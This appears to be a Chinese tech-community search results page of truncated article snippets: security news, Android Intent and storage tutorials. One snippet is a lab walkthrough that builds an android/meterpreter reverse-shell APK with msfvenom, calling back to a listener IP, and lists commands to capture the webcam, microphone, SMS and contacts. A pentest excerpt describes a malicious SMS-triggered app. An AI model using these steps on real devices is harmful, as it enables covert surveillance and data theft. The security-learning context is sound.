首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

恶意软件伪装成PDF传播、新冠病毒变种成钓鱼攻击诱饵|12月3日全球网络安全热点

这个新的Emotet活动从被盗的电子邮件回复链开始,这些电子邮件显示为对现有对话的回复。这些回复只是告诉收件人“请参阅附件”并包含指向与电子邮件对话相关的所谓PDF的链接。...社交工程短信被用来在Android设备上安装恶意软件,这是一场广泛的网络钓鱼活动的一部分,该活动冒充伊朗政府和社会保障服务机构,以窃取信用卡详细信息并从受害者的银行账户中窃取资金。...与银行恶意软件的其他变种不同,银行恶意软件会在受害者不知情的情况下进行覆盖攻击以捕获敏感数据,Check Point Research发现的恶意应用程序旨在通过向目标发送看似合法的包含链接的SMS消息,...这家网络安全公司表示,它发现了数百个不同的网络钓鱼Android应用程序,这些应用程序伪装成设备跟踪应用程序、伊朗银行、约会和购物网站、加密货币交易所以及与政府相关的服务,这些僵尸网络作为“即用型移动活动...这些电子邮件声称为收件人提供免费的Omicron PCR测试,据称可以帮助他们绕过限制。

1.3K20
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    超三十万台设备感染银行木马、远程代码漏洞可攻击云主机|12月7日全球网络安全热点

    在公司Abiom拒绝遵守勒索软件组织LockBit的要求后,共有39,000份文件(包括身份证件和发票)在网上泄露。 安全专家Matthijs Koot表示,这次攻击代表了勒索软件运营商的一种新策略。...该意大利活动于2021年6月首次被发现,通过短信网络钓鱼(也称为smishing)发送多个Android应用程序,相关样本在Virus Total中只有50%的安全软件检测为恶意。...攻击始于链接恶意网站的未经请求的短信(SMS),声称是来自银行的消息,敦促收件人下载反垃圾邮件应用程序。最终受害者会下载BRATA恶意软件,或将他们带到网络钓鱼页面以输入其银行帐号密码的页面。.../ 针对超过300,000台设备的4个Android银行木马活动 2021年8月至11月期间,四种不同的Android银行木马通过官方Google Play商店传播,导致超过300,000次通过各种应用程序感染...在Mandiant的一份新报告中,研究人员利用这一活动发现了黑客组织使用的策略、技术和程序(TTP),以及一个名为“Ceeloader”的新自定义下载器。

    1.9K30

    Intent的七大属性, ComponentName、  Action 、 Category 、 Data  、Type、  Extra  、Flags。

    (一)、ComponentName属性: 1、指定了ComponentName属性的Intent已经明确了它将要启动哪个组件,因此这种Intent被称为显式Intent,没有指定ComponentName...【如果设置多个,则哪个在前,执行哪个。】 ACTION_VIEW: (android.intent.action.VIEW) 显示指定数据。...startActivity(intent); (五)、Type属性: 1、Type属性用于指定Data所指定的Uri对应的MIME类型。...此启动模式和我们使用的浏览器工作原理类似,在多个程序中访问浏览器时,如果当前浏览器没有打开,则打开浏览器,否则会在当前打开的浏览器中访问。...("smsto:10086")); intent.putExtra("sms_body", "该吃饭了,下课吧!")

    9310

    Intent 属性详解(下)

    />子元素只指定了 android:scheme、android:host属性,那么只 要 Intent 的 Data 属性的 scheme、host 部分与 android:scheme、android.../>子元素指定了 android:scheme、android:host、android:port 属性,那么只要 Intent 的 Data 属性的 scheme、host、port 部分与 android.../>子元素只指定了 android:scheme、android:host、android:path 属性,那么只要 Intent 的 Data 属性的 scheme、host、path 部分与 android...如果目标组件的子元素指定了android:scheme、android:host、android:port、 android:path 属性,那么就要求 Intent 的 Data 属性的...一旦为Intent同时指定了 Action、Data属性,Android就可根据指定的数据类型来启动特定的应用程序,并对指定数据执行相应的操作。

    1.2K50

    3.数据存储

    :sd卡有但是并没有进行挂载     MEDIA_CHECKING:sd卡正在准备     MEDIA_MOUNTED:sd卡正在挂载 最简单的打开sd卡的方式 File file = new...Android中主要提供了三种方法用于得到 SharedPreferences对象。...此方法接收两个参数,第一个参数用于指定 SharedPreferences文件的名称,如果指定的文件不存在则会创建一个,第二个参数用于指定操作模式,主要有两种模式可以选择,MODE_PRIVATE和 MODE_MULTI_PROCESS...MODE_MULTI_PROCESS则一般是用于会有多个进程中对同一个SharedPreferences文件进行读写的情况。...Activity类中的 getPreferences()方法 这个方法和 Context中的 getSharedPreferences()方法很相似,不过它只接收一个操作模式参数,因为使用这个方法时会自动将当前活动的类名作为

    95370

    美少妇与Android的故事

    实验环境 系统: Kali Liunx 工具: MFS 目标 :安卓手机 首先打开msf,输入命令 show payloads 查看攻击载荷 配置木马并生成 msfvenom -p android/meterpreter...攻击载荷 LHOST=192.168.74.129 控制端的IP(也就是本机kali的ip) 查询IP的指令 ifconfig LPORT=4444 监听端口 R > /root/桌面/shell.apk...常用命令 webcam_list 列出网络摄像头 record_mic [ˈrekərd]/记录/ 从默认麦克风录制音频为X秒 webcam_chat 开始视频聊天 webcam_snap 从指定的摄像头获取快照...webcam_stream -i 1 从指定的网络摄像头播放视频流[选择后摄像头 activity_start 从URI字符串启动Android活动 check_root 检查设备是否有根 dump_calllog...获取调用日志 dump_contacts 获取联系人列表 dump_sms 获取短信 geolocate 利用地理定位获取当前LAT wlan_geolocate 利用WLAN信息获取当前LAT

    68820

    Android 进阶3:Intent 与 IntentFilter 匹配规则

    3.Intent 类将为标准化的数据类型指定多个 EXTRA_* 常量。...例如,使用 ACTION_SEND 创建用于发送电子邮件的 Intent 时,可以使用 EXTRA_EMAIL 键指定“目标”收件人,并使用 EXTRA_SUBJECT 键指定“主题”。...一个 Activity 也可以有多个 IntentFilter,相当于多了几个过滤器,被筛选到的可能就更大了。...系统为我们提供了很多内置的 action,当然也可以自定义。 一个 Intent-filter 中可以有多个 action,就好比一个人有多种才能。...host: 主机 第二重要,主机地址决定了具体 ip port:端口 第三重要,一个主机可能有多个网卡端口,有了端口后才能访问到具体 path:具体路径 最后一级,表示要访问的文件夹路径

    1.1K80

    Android 渗透测试学习手册 第七章 不太知名的 Android 漏洞

    以下屏幕截图显示了修改后的响应的样子: 一旦我们点击Forward(转发)按钮,邮件将从受害者的设备发送到攻击者指定的号码。...执行此操作的最简单的方法之一是编写一个简单的恶意应用程序,并将其所有恶意活动放在服务中。...此外,我们在AndroidManifest.xml文件中添加广播接收器,以便指定的事件(例如接收 SMS)能够触发我们的服务。...> android:name="android.provider.Telephony.SMS_RECEIVED" /> 的手机上打开这个恶意应用程序,它将调用海豚浏览器 HD,打开 URL 和我们指定的 JavaScript 代码,如下面的截图所示: 总结 在本章中,我们了解了 Android 中的不同攻击向量

    1.2K10

    隐式意图和显式意图的使用场景

    激活系统的某些应用,并且往应用里面填一些数据,比如说短信应用 打开短信应用,查看logcat,找到ActivityManager, 看到Display.com.android.mms/.ui.ComposeMessageActivity...查看短信源代码的清单文件,可以看到,一个activity节点下面可以有多个intent-filter,一个意图过滤器里面可以设置多个action,category,data满足一个就可以。...测试一下, 获取Intent对象,new出来 调用Intent对象的setAction()方法,参数:”android.intent.action.SENDTO” 调用Intent对象的addCategory...()方法,参数:”android.intent.category.DEFAULT” 调用Intent对象的setData()方法,参数:Uri对象,例如:Uri.parse(”sms:110”) 因此可以明白前面拨打电话部分的写法了...区别: 显式意图:同一个应用程序里面,自己激活自己,推荐使用,指定包名类名 隐式意图:不同的应用程序里面,激活别人的程序,或者被别人激活,推荐使用 隐式意图会查询系统里面的所有activity,如果有符合条件的就会直接启动

    1.1K20

    Android Intent用法总结

    Android中提供了Intent机制来协助应用间的交互与通讯,Intent负责对应用中一次操作的动作、动作涉及数据、附加数据进行描述,Android则根据此Intent的描述,负责找到对应的组件,将...Intent种类 显式Intent 显式,即直接指定需要打开的activity对应的类。...发送Data到指定的地方 ACTION_SENDTO 发送多组Data到指定的地方 ACTION_RUN 运行Data,不管Data是什么 ACTION_SEARCH 执行搜索 ACTION_WEB_SEARCH...,但是通过设置这个属性,可以强制采用显式指定的类型而不再进行推导。...Component:目的组件 指定Intent的目标组件名称,当指定了这个属性后,系统将跳过匹配其他属性,而直接匹配这个属性来启动对应的组件。

    1.6K10

    android学习笔记----短信发送器

    /ui/conversationlist/ShareIntentActivity.java 找到之后,在网页中查找getStringExtra去匹配文本 发现了一个Intent.EXTRA_TEXT,这就是我们想要的键...注:从Android4.4开始(API级别19),如果只有当不选择应用程序作为默认SMS应用程序,系统会自动将使用此方法发送的消息写入SMS提供者(默认SMS应用始终负责将其发送的消息写入SMS提供程序...有关如何作为默认SMS应用程序运行的信息,请参阅Telephony....基于每个应用程序的SMS控制检查哨兵。如果SentIntent为NULL,调用者将根据所有未知的应用程序进行检查,这将导致在检查期间发送较少数量的SMS。...deliveryIntent PendingIntent:如果不为空,则为PendingIntent消息传递到收件人时广播。状态报告的原始PDU位于扩展数据(“PDU”)中。

    47110

    JPush相关概念

    系统不限定一个别名只能指定一个用户。如果一个别名被指定到了多个用户,当给指定这个别名发消息时,服务器端API会同时给这多个用户发送消息。 举例:在一个用户要登录的游戏中,可能设置别名为 userid。...关键字 类型 选项 含义 说明 alert string 必填 通知内容 这里指定了,则会覆盖上级统一指定的 alert 信息;内容可以为空字符串,则表示不展示到通知栏。...title string 可选 通知标题 如果指定了,则通知里原来展示 App名称的地方,将展示成这个字段。...这里指定了,将会覆盖上级统一指定的 alert 信息;内容为空则不展示到通知栏。 title string 可选 通知标题 会填充到 toast 类型 text1 字段上。..._open_page string 可选 点击打开的页面名称 点击打开的页面。会填充到推送信息的 param 字段上,表示由哪个 App 页面打开该通知。可不填,则由默认的首页打开。

    90220

    ShellExecute使用详解

    大家好,又见面了,我是你们的朋友全栈君。 有三个API函数可以运行可执行文件WinExec、ShellExecute和CreateProcess。...其中“open”操作表示执行由FileName参数指定的程序,或打开由FileName参数指定的文件或文件 夹;“print”操作表示打印由FileName参数指定的文件;“explore”操作表示浏览由...●FileName:用于指定要打开的文件名、要执行的程序文件名或要浏览的文件夹名。   ...2).特殊用法   如果将FileName参数设置为“http:”协议格式,那么该函数将打开默认浏览器并链接到指定的URL地址。...若指定多个收件人地址,则收件人地址之间必须用分号或逗号分隔开(下同)。   格式三:mailt用户账号@邮件服务器地址?

    1.1K10

    ShellExecute 启动外部程序 参数详细介绍

    } Operation: PChar; {指定动作, 譬如: open、runas、print、edit、explore、find[2]} FileName: PChar; {指定要打开的文件或程序}...Parameters: PChar; {给要打开的程序指定参数; 如果打开的是文件这里应该是 nil} Directory: PChar; {缺省目录} ShowCmd: Integer {打开选项}...其中“open”操作表示执行由FileName参数指定的程序,或打开由FileName参数指定的文件或文件夹;“print”操作表示打印由FileName参数指定的文件;“explore”操作表示浏览由...●FileName:用于指定要打开的文件名、要执行的程序文件名或要浏览的文件夹名。...若指定多个收件人地址,则收件人地址之间必须用分号或逗号分隔开(下同)。

    4K110

    一场针对伊朗的为期6年的网络间谍活动

    一项新的研究揭示了长达六年之久的针对伊朗侨民和持不同政见者的监视行动,而核心意图是窃取敏感信息。...据称,一名被怀疑来自伊朗的恐怖分子策划了这场监视活动,其中至少由两个不同的活动组成——一个针对Windows系统,另一个针对安卓系统。...活动使用了包含大量入侵工具的武器库,旨在窃取SMS消息中的个人文档,密码,电报消息和两因素身份验证代码。...Android信息窃取者:捕获Google SMS 2FA代码 Android后门具有记录受感染手机周围环境和检索联系人详细信息的功能,它通过一个伪装成服务的应用程序安装,以帮助瑞典的波斯语使用者获得驾驶执照...Check Point表示,它发现了多个可追溯至2014年的恶意软件变体,其中某些版本同时使用,并且两者之间存在显著差异,如用不同的编程语言编写,使用了多种通信协议,而且并不总是窃取相同类型的信息。

    75120
    领券